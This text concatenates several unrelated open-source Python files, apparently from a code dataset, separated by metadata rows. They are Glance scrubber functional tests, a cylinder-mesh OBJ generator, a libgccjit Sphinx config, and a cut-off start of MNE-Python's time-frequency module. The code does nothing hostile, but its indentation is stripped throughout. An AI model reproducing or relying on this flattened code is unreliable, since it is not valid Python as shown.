def test_scrubber_app(self):
"""
test that the glance-scrubber script runs successfully when not in
daemon mode
"""
self.cleanup()
kwargs = self.__dict__.copy()
self.start_servers(delayed_delete=True, daemon=False,
metadata_encryption_key='', **kwargs)
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
response, content = self._send_http_request(path, 'DELETE')
self.assertEqual(http_client.NO_CONTENT, response.status)
image = self._get_pending_delete_image(image['id'])
self.assertEqual('pending_delete', image['status'])
# wait for the scrub time on the image to pass
time.sleep(self.api_server.scrub_time)
# scrub images and make sure they get deleted
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name))
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(0, exitcode)
self.wait_for_scrub(image['id'])
self.stop_servers()
def test_scrubber_delete_handles_exception(self):
"""
Test that the scrubber handles the case where an
exception occurs when _delete() is called. The scrubber
should not write out queue files in this case.
"""
# Start servers.
self.cleanup()
kwargs = self.__dict__.copy()
self.start_servers(delayed_delete=True, daemon=False,
default_store='file', **kwargs)
# Check that we are using a file backend.
self.assertEqual(self.api_server.default_store, 'file')
# add an image
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
# delete the image
response, content = self._send_http_request(path, 'DELETE')
self.assertEqual(http_client.NO_CONTENT, response.status)
# ensure the image is marked pending delete.
image = self._get_pending_delete_image(image['id'])
self.assertEqual('pending_delete', image['status'])
# Remove the file from the backend.
file_path = os.path.join(self.api_server.image_dir, image['id'])
os.remove(file_path)
# Wait for the scrub time on the image to pass
time.sleep(self.api_server.scrub_time)
# run the scrubber app, and ensure it doesn't fall over
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name))
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(0, exitcode)
self.wait_for_scrub(image['id'])
self.stop_servers()
def test_scrubber_app_queue_errors_not_daemon(self):
"""
test that the glance-scrubber exits with an exit code > 0 when it
fails to lookup images, indicating a configuration error when not
in daemon mode.
Related-Bug: #1548289
"""
# Don't start the registry server to cause intended failure
# Don't start the api server to save time
exitcode, out, err = self.scrubber_daemon.start(
delayed_delete=True, daemon=False)
self.assertEqual(0, exitcode,
"Failed to spin up the Scrubber daemon. "
"Got: %s" % err)
# Run the Scrubber
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name))
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(1, exitcode)
self.assertIn('Can not get scrub jobs from queue', str(err))
self.stop_server(self.scrubber_daemon)
def test_scrubber_restore_image(self):
self.cleanup()
kwargs = self.__dict__.copy()
self.start_servers(delayed_delete=True, daemon=False,
metadata_encryption_key='', **kwargs)
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
response, content = self._send_http_request(path, 'DELETE')
self.assertEqual(http_client.NO_CONTENT, response.status)
image = self._get_pending_delete_image(image['id'])
self.assertEqual('pending_delete', image['status'])
def _test_content():
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s --restore %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name, image['id']))
return execute(cmd, raise_error=False)
exitcode, out, err = self.wait_for_scrubber_shutdown(_test_content)
self.assertEqual(0, exitcode)
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
self.stop_servers()
def test_scrubber_restore_active_image_raise_error(self):
self.cleanup()
self.start_servers(delayed_delete=True, daemon=False,
metadata_encryption_key='')
path = "http://%s:%d/v2/images" % ("127.0.0.1", self.api_port)
response, content = self._send_create_image_http_request(path)
self.assertEqual(http_client.CREATED, response.status)
image = jsonutils.loads(content)
self.assertEqual('queued', image['status'])
file_path = "%s/%s/file" % (path, image['id'])
response, content = self._send_upload_image_http_request(file_path,
body='XXX')
self.assertEqual(http_client.NO_CONTENT, response.status)
path = "%s/%s" % (path, image['id'])
response, content = self._send_http_request(path, 'GET')
image = jsonutils.loads(content)
self.assertEqual('active', image['status'])
def _test_content():
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s --restore %s" %
(exe_cmd, self.scrubber_daemon.conf_file_name, image['id']))
return execute(cmd, raise_error=False)
exitcode, out, err = self.wait_for_scrubber_shutdown(_test_content)
self.assertEqual(1, exitcode)
self.assertIn('cannot restore the image from active to active '
'(wanted from_state=pending_delete)', str(err))
self.stop_servers()
def test_scrubber_restore_image_non_exist(self):
def _test_content():
scrubber = functional.ScrubberDaemon(self.test_dir,
self.policy_file)
scrubber.write_conf(daemon=False)
scrubber.needs_database = True
scrubber.create_database()
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --config-file %s --restore fake_image_id" %
(exe_cmd, scrubber.conf_file_name))
return execute(cmd, raise_error=False)
exitcode, out, err = self.wait_for_scrubber_shutdown(_test_content)
self.assertEqual(1, exitcode)
self.assertIn('No image found with ID fake_image_id', str(err))
def test_scrubber_restore_image_with_daemon_raise_error(self):
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --daemon --restore fake_image_id" % exe_cmd)
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(1, exitcode)
self.assertIn('The restore and daemon options should not be set '
'together', str(err))
def test_scrubber_restore_image_with_daemon_running(self):
self.cleanup()
self.scrubber_daemon.start(daemon=True)
# Give the scrubber some time to start.
time.sleep(5)
exe_cmd = "%s -m glance.cmd.scrubber" % sys.executable
cmd = ("%s --restore fake_image_id" % exe_cmd)
exitcode, out, err = execute(cmd, raise_error=False)
self.assertEqual(1, exitcode)
self.assertIn('glance-scrubber is already running', str(err))
self.stop_server(self.scrubber_daemon)
def wait_for_scrubber_shutdown(self, func):
# NOTE(wangxiyuan, rosmaita): The image-restore functionality contains
# a check to make sure the scrubber isn't also running in daemon mode
# to prevent a race condition between a delete and a restore.
# Sometimes the glance-scrubber process which is setup by the
# previous test can't be shutdown immediately, so if we get the "daemon
# running" message we sleep and try again.
not_down_msg = 'glance-scrubber is already running'
total_wait = 15
for _ in range(total_wait):
exitcode, out, err = func()
if exitcode == 1 and not_down_msg in str(err):
time.sleep(1)
continue
return exitcode, out, err
else:
self.fail('Scrubber did not shut down within {} sec'.format(
total_wait))
def wait_for_scrub(self, image_id):
"""
NOTE(jkoelker) The build servers sometimes take longer than 15 seconds
to scrub. Give it up to 5 min, checking checking every 15 seconds.
When/if it flips to deleted, bail immediately.
"""
wait_for = 300 # seconds
check_every = 15 # seconds
for _ in range(wait_for // check_every):
time.sleep(check_every)
image = db_api.get_api().image_get(self.admin_context, image_id)
if (image['status'] == 'deleted' and
image['deleted'] == True):
break
else:
continue
else:
self.fail('image was never scrubbed')
| apache-2.0 | -8,988,473,799,641,938,000 | 40.22439 | 79 | 0.591528 | false |
songrun/HighResWeights-2016 | py-tools/make_cylinder_2D.py | 1 | 9630 | #!/usr/bin/env python
from __future__ import print_function, division
from numpy import *
def make_cylinder( num_slices, num_stacks = 2, cap_uv_distance = 0.1, height = 1. ):
'''
Make a cylinder whose axis is (0,0,-0) to (0,0,1) and radius is 1. This includes the top cap.
The parameters are:
num_slices: an integer >= 3 that determines how many vertices there should be around the circular cross section of the cylinder.
num_stacks: an integer >= 1 that determines how many vertices there should be along the axis of the cylinder.
cap_uv_distance: a positive floating point number that determines how much vertical distance in the UV map is given to each polar cap. It can't be greater than 0.5, because the entire V range is 1.
Returns three floating point arrays containing:
v: positions (xyz)
vt: uvs (uv)
vn: normals (xyz)
Returns three indexing arrays of faces containing:
fv: [ face 0 vertex 0's position index, face 0 vertex 1's position index, face 0 vertex 2's position index ], ...
fvt: [ face 0 vertex 0's uv index, face 0 vertex 1's uv index, face 0 vertex 2's uv index ], ...
fvn: [ face 0 vertex 0's normal index, face 0 vertex 1's normal index, face 0 vertex 2's normal index ], ...
Note that indices are 0-indexed.
'''
assert num_slices >= 3
assert int( num_slices ) == num_slices
assert num_stacks >= 1
assert int( num_stacks ) == num_stacks
assert cap_uv_distance >= 0.
assert cap_uv_distance <= 0.5
print( 'make_cylinder():' )
print( '\tnum_slices:', num_slices )
print( '\tnum_stacks:', num_stacks )
print( '\tcap_uv_distance:', cap_uv_distance )
print( '\theight:', height )
## Let's use the following shape for UVs.
## Every slice of the cylinder will repeat this shape (1D).
## -1
## / \
## 0 1
## | |
## 2 3
## ...
## \ /
## -2
N = num_slices
## We want N thetas around the circle from [0,2*pi);
## for texture coordinates we want N+1 samples from [0,1].
around_ts = linspace( 0, 1, N+1 )
## Parameter around the circle from [0,2*pi).
thetas = 2*pi*around_ts[:-1]
assert len( thetas ) == N
circle = array([ cos(thetas), sin(thetas) ]).T
## Parameter along the cylinder
M = num_stacks
## One stack is a special case.
stack_zs = linspace( 1, -1, M ) if M > 1 else zeros(1)
stack_vs = linspace( cap_uv_distance, 1.0 - cap_uv_distance, M ) if M > 1 else 0.5*ones(1)
assert len( stack_zs ) == M
assert len( stack_vs ) == M
## There will be `num_stacks` copies of the circle,
## and another two vertices, one at the center of the top and one at the center of the bottom.
## Therefore, there will be num_stacks*N + 2 vertices.
## There is one additional texture coordinate per circle, because while
## the last triangle around will share positions with the first triangle around,
## the last texture coordinate won't.
vs = zeros( ( num_stacks*N + 2, 3 ) )
vts = zeros( ( num_stacks*(N+1) + 2, 2 ) )
for i, ( z, v ) in enumerate( zip( stack_zs, stack_vs ) ):
## Every N vertices are the circles.
vs[ i*N : (i+1)*N ] = append( circle, z*ones( ( N, 1 ) ), axis = 1 )
vts[ i*(N+1) : (i+1)*(N+1) ] = append( around_ts[:,newaxis], v*ones( ( N+1, 1 ) ), axis = 1 )
## Next comes the top vertex
vs[ -2 ] = ( 0., 0., 1. )
vts[ -2 ] = ( 0.5, 0. )
## Last comes the bottom vertex
vs[ -1 ] = ( 0., 0., -1. )
vts[ -1 ] = ( 0.5, 1. )
vs[:,-1] *= height
## Vertex normals don't need two copies of the circle, so only len(circle) + 2 vertices.
vns = zeros( ( N + 2, 3 ) )
## The first N normals are the outward normals.
vns[ :-2 ] = append( circle, zeros( ( N, 1 ) ), axis = 1 )
## Next comes the top normal.
vns[ -2 ] = ( 0., 0., 1. )
## Last comes the bottom normal.
vns[ -1 ] = ( 0., 0., -1. )
### Stitch together faces.
### 1 For each vertex in the circle, make a quad connecting the top and bottom to the next vertex around the circle's top and bottom.
### 2 For each vertex in the top circle, make a triangle connecting it and the next vertex around the circle to the center-top vertex.
### 3 For each vertex in the bottom circle, make a triangle connecting it and the next vertex around the circle to the center-bottom vertex.
fv = []
fvn = []
fvt = []
### 1
## Add two triangles from a quad.
def add_quad_triangles_to_list( the_quad, the_list ):
the_list.append( ( the_quad[0], the_quad[1], the_quad[2] ) )
the_list.append( ( the_quad[0], the_quad[2], the_quad[3] ) )
for stack in range( num_stacks-1 ):
for i in range( N ):
## The face will be two triangles made from the quad: top, bottom, bottom+1, top+1
## The relevant vs indices are:
fvi = [ stack*N + i, (stack+1)*N + i, (stack+1)*N + (i+1)%N, stack*N + (i+1)%N ]
## The relevant vns indices are:
fvni = [ i, i, (i+1)%N, (i+1)%N ]
## The relevant vts indices are similar to the fvi indices, but with a different modulus:
fvti = [ stack*(N+1) + i, (stack+1)*(N+1) + i, (stack+1)*(N+1) + (i+1)%(N+1), stack*(N+1) + (i+1)%(N+1) ]
add_quad_triangles_to_list( fvi, fv )
add_quad_triangles_to_list( fvni, fvn )
add_quad_triangles_to_list( fvti, fvt )
### 2
for i in range( N ):
## The face will be the triangle: top, top+1, top-center
## The relevant vs indices are:
fvi = [ i, (i+1)%N, len(vs)-2 ]
## The relevant vns indices are:
fvni = [ N, N, N ]
assert len( vns )-2 == N
## The relevant vts indices are similar to the fvi indices, but with a different modulus:
fvti = [ i, (i+1)%(N+1), len(vts)-2 ]
fv.append( fvi )
fvn.append( fvni )
fvt.append( fvti )
### 3
for i in range( N ):
## The face will be the triangle: bottom+1, bottom, bottom-center
## NOTE: The different order is to maintain CCW orientation
## The relevant vs indices are:
fvi = [ (num_stacks-1)*N + (i+1)%N, (num_stacks-1)*N + i, len(vs)-1 ]
## The relevant vns indices are:
fvni = [ N+1, N+1, N+1 ]
assert len( vns )-1 == N+1
## The relevant vts indices are similar to the fvi indices, but with a different modulus:
fvti = [ (num_stacks-1)*(N+1) + (i+1)%(N+1), (num_stacks-1)*(N+1) + i, len(vts)-1 ]
fv.append( fvi )
fvn.append( fvni )
fvt.append( fvti )
class Struct( object ): pass
result = Struct()
result.vs = vs
result.vts = vts
result.vns = vns
result.fv = fv
result.fvt = fvt
result.fvn = fvn
result.extra = [ 'num_slices: %s' % num_slices, 'num_stacks: %s' % num_stacks, 'cap_uv_distance: %s' % cap_uv_distance, 'height: %s' % height ]
return result
def save_obj( mesh, filename ):
import os, sys
assert len( mesh.fv ) == len( mesh.fvt )
assert len( mesh.fv ) == len( mesh.fvn )
if os.path.exists( filename ):
print( "ERROR: File exists; save_obj() will not clobber:", filename )
return
with open( filename, 'wb' ) as out:
print( '# Saved by:', *sys.argv, file = out )
for line in mesh.extra:
print( '#', line, file = out )
print( '', file = out )
for v in mesh.vs:
print( 'v', *v, file = out )
print( '', file = out )
for vt in mesh.vts:
print( 'vt', *vt, file = out )
print( '', file = out )
for vn in mesh.vns:
print( 'vn', *vn, file = out )
print( '', file = out )
for fvis, fvtis, fvnis in zip( mesh.fv, mesh.fvt, mesh.fvn ):
print( 'f', end = '', file = out )
## The face index arrays must agree on the number of vertices in the face.
assert len( fvis ) == len( fvtis )
assert len( fvis ) == len( fvnis )
for fvi, fvti, fvni in zip( fvis, fvtis, fvnis ):
print( ' ', end = '', file = out )
## OBJ's are 1-indexed
print( fvi+1, fvti+1, fvni+1, sep = '/', end = '', file = out )
print( '', file = out )
print( "Saved:", filename )
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser( description = 'Save a cylinder as an OBJ.' )
parser.add_argument( 'num_slices', type = int, help = 'The number of vertices around the cylinder.' )
## Optional positional arguments: http://stackoverflow.com/questions/4480075/argparse-optional-positional-arguments
parser.add_argument( 'num_stacks', type = int, default = 2, nargs='?', help = 'The number of vertices along the cylinder.' )
parser.add_argument( 'cap_uv_distance', type = float, default = 0.1, nargs='?', help = 'How much vertical (v) distance in the UV map is given to each polar cap.' )
parser.add_argument( 'height', type = double, default = 1, nargs='?', help = 'The height the cylinder.' )
parser.add_argument( 'filename', type = str, help = 'The path to save the resulting OBJ.' )
args = parser.parse_args()
cyl = make_cylinder( args.num_slices, args.num_stacks, args.cap_uv_distance, args.height )
save_obj( cyl, args.filename )
| mit | 1,311,845,705,405,727,700 | 40.688312 | 205 | 0.562513 | false |
iains/darwin-gcc-5 | gcc/jit/docs/conf.py | 46 | 8361 | # -*- coding: utf-8 -*-
#
# libgccjit documentation build configuration file, created by
# sphinx-quickstart on Wed Jul 30 13:39:01 2014.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'libgccjit'
copyright = u'2014-2015 Free Software Foundation, Inc.'
# GCC-specific: extract version information from "gcc" src subdir for
# use in "version" and "release" below.
def __read_file(name):
gcc_srcdir = '../..'
path = os.path.join(gcc_srcdir, name)
if os.path.exists(path):
return open(path).read().strip()
else:
return ''
gcc_BASEVER = __read_file('BASE-VER')
gcc_DEVPHASE = __read_file('DEV-PHASE')
gcc_DATESTAMP = __read_file('DATESTAMP')
gcc_REVISION = __read_file('REVISION')
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = gcc_BASEVER
# The full version, including alpha/beta/rc tags.
release = ('%s (%s %s%s)'
% (gcc_BASEVER, gcc_DEVPHASE, gcc_DATESTAMP,
(' %s' % gcc_REVISION) if gcc_REVISION else ''))
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'libgccjitdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'libgccjit.tex', u'libgccjit Documentation',
u'David Malcolm', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'libgccjit', u'libgccjit Documentation',
[u'David Malcolm'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'libgccjit', u'libgccjit Documentation',
u'David Malcolm', 'libgccjit', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| gpl-2.0 | -959,297,436,546,340,600 | 31.406977 | 80 | 0.698481 | false |
cmoutard/mne-python | mne/time_frequency/tfr.py | 3 | 54818 | """A module which implements the time frequency estimation.
Morlet code inspired by Matlab code from Sheraz Khan & Brainstorm & SPM
"""
# Authors : Alexandre Gramfort <[email protected]>
# Hari Bharadwaj <[email protected]>
#
# License : BSD (3-clause)
import warnings
from math import sqrt
from copy import deepcopy
import numpy as np
from scipy import linalg
from scipy.fftpack import fftn, ifftn
from ..fixes import partial
from ..baseline import rescale
from ..parallel import parallel_func
from ..utils import logger, verbose, _time_mask
from ..channels.channels import ContainsMixin, UpdateChannelsMixin
from ..io.pick import pick_info, pick_types
from ..io.meas_info import Info
from ..utils import check_fname
from .multitaper import dpss_windows
from ..viz.utils import figure_nobar, plt_show
from ..externals.h5io import write_hdf5, read_hdf5
from ..externals.six import string_types
def _get_data(inst, return_itc):
"""Get data from Epochs or Evoked instance as epochs x ch x time"""
from ..epochs import _BaseEpochs
from ..evoked import Evoked
if not isinstance(inst, (_BaseEpochs, Evoked)):
raise TypeError('inst must be Epochs or Evoked')
if isinstance(inst, _BaseEpochs):
data = inst.get_data()
else:
if return_itc:
raise ValueError('return_itc must be False for evoked data')
data = inst.data[np.newaxis, ...].copy()
return data
def morlet(sfreq, freqs, n_cycles=7, sigma=None, zero_mean=False):
"""Compute Wavelets for the given frequency range
Parameters
----------
sfreq : float
Sampling Frequency
freqs : array
frequency range of interest (1 x Frequencies)
n_cycles: float | array of float
Number of cycles. Fixed number or one per frequency.
sigma : float, (optional)
It controls the width of the wavelet ie its temporal
resolution. If sigma is None the temporal resolution
is adapted with the frequency like for all wavelet transform.
The higher the frequency the shorter is the wavelet.
If sigma is fixed the temporal resolution is fixed
like for the short time Fourier transform and the number
of oscillations increases with the frequency.
zero_mean : bool
Make sure the wavelet is zero mean
Returns
-------
Ws : list of array
Wavelets time series
See Also
--------
mne.time_frequency.cwt_morlet : Compute time-frequency decomposition
with Morlet wavelets
"""
Ws = list()
n_cycles = np.atleast_1d(n_cycles)
if (n_cycles.size != 1) and (n_cycles.size != len(freqs)):
raise ValueError("n_cycles should be fixed or defined for "
"each frequency.")
for k, f in enumerate(freqs):
if len(n_cycles) != 1:
this_n_cycles = n_cycles[k]
else:
this_n_cycles = n_cycles[0]
# fixed or scale-dependent window
if sigma is None:
sigma_t = this_n_cycles / (2.0 * np.pi * f)
else:
sigma_t = this_n_cycles / (2.0 * np.pi * sigma)
# this scaling factor is proportional to (Tallon-Baudry 98):
# (sigma_t*sqrt(pi))^(-1/2);
t = np.arange(0., 5. * sigma_t, 1.0 / sfreq)
t = np.r_[-t[::-1], t[1:]]
oscillation = np.exp(2.0 * 1j * np.pi * f * t)
gaussian_enveloppe = np.exp(-t ** 2 / (2.0 * sigma_t ** 2))
if zero_mean: # to make it zero mean
real_offset = np.exp(- 2 * (np.pi * f * sigma_t) ** 2)
oscillation -= real_offset
W = oscillation * gaussian_enveloppe
W /= sqrt(0.5) * linalg.norm(W.ravel())
Ws.append(W)
return Ws
def _dpss_wavelet(sfreq, freqs, n_cycles=7, time_bandwidth=4.0,
zero_mean=False):
"""Compute Wavelets for the given frequency range
Parameters
----------
sfreq : float
Sampling Frequency.
freqs : ndarray, shape (n_freqs,)
The frequencies in Hz.
n_cycles : float | ndarray, shape (n_freqs,)
The number of cycles globally or for each frequency.
Defaults to 7.
time_bandwidth : float, (optional)
Time x Bandwidth product.
The number of good tapers (low-bias) is chosen automatically based on
this to equal floor(time_bandwidth - 1).
Default is 4.0, giving 3 good tapers.
Returns
-------
Ws : list of array
Wavelets time series
"""
Ws = list()
if time_bandwidth < 2.0:
raise ValueError("time_bandwidth should be >= 2.0 for good tapers")
n_taps = int(np.floor(time_bandwidth - 1))
n_cycles = np.atleast_1d(n_cycles)
if n_cycles.size != 1 and n_cycles.size != len(freqs):
raise ValueError("n_cycles should be fixed or defined for "
"each frequency.")
for m in range(n_taps):
Wm = list()
for k, f in enumerate(freqs):
if len(n_cycles) != 1:
this_n_cycles = n_cycles[k]
else:
this_n_cycles = n_cycles[0]
t_win = this_n_cycles / float(f)
t = np.arange(0., t_win, 1.0 / sfreq)
# Making sure wavelets are centered before tapering
oscillation = np.exp(2.0 * 1j * np.pi * f * (t - t_win / 2.))
# Get dpss tapers
tapers, conc = dpss_windows(t.shape[0], time_bandwidth / 2.,
n_taps)
Wk = oscillation * tapers[m]
if zero_mean: # to make it zero mean
real_offset = Wk.mean()
Wk -= real_offset
Wk /= sqrt(0.5) * linalg.norm(Wk.ravel())
Wm.append(Wk)
Ws.append(Wm)
return Ws
def _centered(arr, newsize):
"""Aux Function to center data"""
# Return the center newsize portion of the array.
newsize = np.asarray(newsize)
currsize = np.array(arr.shape)
startind = (currsize - newsize) // 2
endind = startind + newsize
myslice = [slice(startind[k], endind[k]) for k in range(len(endind))]
return arr[tuple(myslice)]
def _cwt_fft(X, Ws, mode="same"):
"""Compute cwt with fft based convolutions
Return a generator over signals.
"""
X = np.asarray(X)
# Precompute wavelets for given frequency range to save time
n_signals, n_times = X.shape
n_freqs = len(Ws)
Ws_max_size = max(W.size for W in Ws)
size = n_times + Ws_max_size - 1
# Always use 2**n-sized FFT
fsize = 2 ** int(np.ceil(np.log2(size)))
# precompute FFTs of Ws
fft_Ws = np.empty((n_freqs, fsize), dtype=np.complex128)
for i, W in enumerate(Ws):
if len(W) > n_times:
raise ValueError('Wavelet is too long for such a short signal. '
'Reduce the number of cycles.')
fft_Ws[i] = fftn(W, [fsize])
for k, x in enumerate(X):
if mode == "full":
tfr = np.zeros((n_freqs, fsize), dtype=np.complex128)
elif mode == "same" or mode == "valid":
tfr = np.zeros((n_freqs, n_times), dtype=np.complex128)
fft_x = fftn(x, [fsize])
for i, W in enumerate(Ws):
ret = ifftn(fft_x * fft_Ws[i])[:n_times + W.size - 1]
if mode == "valid":
sz = abs(W.size - n_times) + 1
offset = (n_times - sz) / 2
tfr[i, offset:(offset + sz)] = _centered(ret, sz)
else:
tfr[i, :] = _centered(ret, n_times)
yield tfr
def _cwt_convolve(X, Ws, mode='same'):
"""Compute time freq decomposition with temporal convolutions
Return a generator over signals.
"""
X = np.asarray(X)
n_signals, n_times = X.shape
n_freqs = len(Ws)
# Compute convolutions
for x in X:
tfr = np.zeros((n_freqs, n_times), dtype=np.complex128)
for i, W in enumerate(Ws):
ret = np.convolve(x, W, mode=mode)
if len(W) > len(x):
raise ValueError('Wavelet is too long for such a short '
'signal. Reduce the number of cycles.')
if mode == "valid":
sz = abs(W.size - n_times) + 1
offset = (n_times - sz) / 2
tfr[i, offset:(offset + sz)] = ret
else:
tfr[i] = ret
yield tfr
def cwt_morlet(X, sfreq, freqs, use_fft=True, n_cycles=7.0, zero_mean=False):
"""Compute time freq decomposition with Morlet wavelets
This function operates directly on numpy arrays. Consider using
`tfr_morlet` to process `Epochs` or `Evoked` instances.
Parameters
----------
X : array of shape [n_signals, n_times]
signals (one per line)
sfreq : float
sampling Frequency
freqs : array
Array of frequencies of interest
use_fft : bool
Compute convolution with FFT or temoral convolution.
n_cycles: float | array of float
Number of cycles. Fixed number or one per frequency.
zero_mean : bool
Make sure the wavelets are zero mean.
Returns
-------
tfr : 3D array
Time Frequency Decompositions (n_signals x n_frequencies x n_times)
See Also
--------
tfr.cwt : Compute time-frequency decomposition with user-provided wavelets
"""
mode = 'same'
# mode = "valid"
n_signals, n_times = X.shape
n_frequencies = len(freqs)
# Precompute wavelets for given frequency range to save time
